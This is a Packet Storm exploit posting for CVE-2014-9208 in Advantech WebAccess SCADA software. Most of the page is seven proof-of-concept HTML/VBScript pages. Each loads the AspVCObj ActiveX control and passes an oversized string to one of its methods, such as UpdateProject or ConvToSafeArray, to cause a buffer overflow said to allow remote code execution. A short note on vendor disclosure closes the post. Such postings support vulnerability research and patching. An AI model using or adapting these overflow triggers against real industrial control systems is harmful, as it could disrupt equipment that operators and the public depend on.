Twenty Year Anniversary

Advantech WebAccess 8.0 / 3.4.3 Code Execution

Advantech WebAccess 8.0 / 3.4.3 Code Execution
Posted Sep 7, 2015
Authored by Praveen Darshanam

Using Advantech WebAccess SCADA Software and attacker can remotely manage industrial control systems devices like RTU's, generators, motors, etc. Attackers can execute code remotely by passing a maliciously crafted string to ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.

tags | exploit, activex
advisories | CVE-2014-9208
MD5 | f17c7b4d90cf1d0a5543245f4b52d5c9

Advantech WebAccess 8.0 / 3.4.3 Code Execution

Change Mirror Download
Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTU's, Generators, Motors etc. Attackers can
execute code remotely by passing maliciously crafted string to
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.

Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>

<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal
ProjTimeout As Long , ByVal ProjDir As String )"
-->

arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"

target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script></html>
</html>


*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->

arg1=String(1044, "A")

target.InterfaceFilter arg1

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As
String )"
-->

arg1=1
arg2=String(1044, "A")

target.FileProcess arg1 ,arg2

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr
As String ) As String"
-->

arg1=1
arg2=String(1044, "A")

target.GetWideStrCpy arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal
filePath As String )"
-->

arg1=1
arg2=String(1044, "A")

target.GetRecipeInfo arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->

arg1=String(1044, "A")

target.GetLastTagNbr arg1

</script></html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal
inStr As String )"
-->

arg1=1
arg2=String(2068, "A")

target.ConvToSafeArray arg1 ,arg2

</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC.From April 2015 they has been postponing the
fix.

Best Regards,
Praveen Darshanam


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    7 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close